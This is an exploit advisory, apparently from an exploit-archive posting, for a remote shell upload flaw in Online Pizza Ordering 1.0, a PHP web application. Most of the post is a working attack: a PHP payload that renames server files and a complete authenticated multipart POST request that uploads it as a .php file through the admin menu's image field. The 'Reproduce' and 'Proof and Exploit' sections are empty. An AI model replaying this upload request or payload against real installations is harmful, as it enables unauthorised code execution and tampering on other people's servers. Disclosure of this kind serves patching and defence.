Headline
Online Pizza Ordering 1.0 Shell Upload
Online Pizza Ordering version 1.0 suffers from a remote shell upload vulnerability.
Title: Online-Pizza-Ordering-1.0 File-Inclusion-RCE
Author: nu11secur1ty
Date: 03.30.2023
Vendor: https://github.com/oretnom23
Software: https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html
Reference: https://portswigger.net/web-security/file-upload
Description:
The malicious user can request an account from the administrator of
this system.
Then he can use this vulnerability to destroy or get access to all
accounts of this system, even more, worst than ever.
The malicious user can upload a very dangerous file on this server,
and he can execute it via shell.
The status is CRITICAL.
STATUS: HIGH Vulnerability
[+]Exploit:
<?php
// by nu11secur1ty - 2023
// Old Name Of The file
$old_name = "C:/xampp7/htdocs/pwnedhost17/php-opos17" ;
// New Name For The File
$new_name = "C:/xampp7/htdocs/pwnedhost17/php-opos" ;
// using rename() function to rename the file
rename( $old_name, $new_name) ;
?>
[+]Injection_REQUEST:
POST /php-opos/admin/ajax.php?action=save_menu HTTP/1.1
Host: pwnedhost7.com
Content-Length: 1050
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111
Safari/537.36
Content-Type: multipart/form-data;
boundary=----WebKitFormBoundaryt8ceBsdqMkRKDoHX
Origin: http://pwnedhost7.com
Referer: http://pwnedhost7.com/php-opos/admin/index.php?page=menu
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=sn639s6euv91mfc9rbef4tdr1p
Connection: close
------WebKitFormBoundaryt8ceBsdqMkRKDoHX
Content-Disposition: form-data; name="id"
------WebKitFormBoundaryt8ceBsdqMkRKDoHX
Content-Disposition: form-data; name="name"
------WebKitFormBoundaryt8ceBsdqMkRKDoHX
Content-Disposition: form-data; name="description"
------WebKitFormBoundaryt8ceBsdqMkRKDoHX
Content-Disposition: form-data; name="status"
on
------WebKitFormBoundaryt8ceBsdqMkRKDoHX
Content-Disposition: form-data; name="category_id"
4
------WebKitFormBoundaryt8ceBsdqMkRKDoHX
Content-Disposition: form-data; name="price"
------WebKitFormBoundaryt8ceBsdqMkRKDoHX
Content-Disposition: form-data; name="img"; filename="namebasterd.php"
Content-Type: application/octet-stream
<?php
// by nu11secur1ty - 2023
// Old Name Of The file
$old_name = "C:/xampp7/htdocs/pwnedhost17/php-opos17" ;
// New Name For The File
$new_name = "C:/xampp7/htdocs/pwnedhost17/php-opos" ;
// using rename() function to rename the file
rename( $old_name, $new_name) ;
?>
------WebKitFormBoundaryt8ceBsdqMkRKDoHX--
Reproduce:
Proof and Exploit:
Time spend:
00:45:00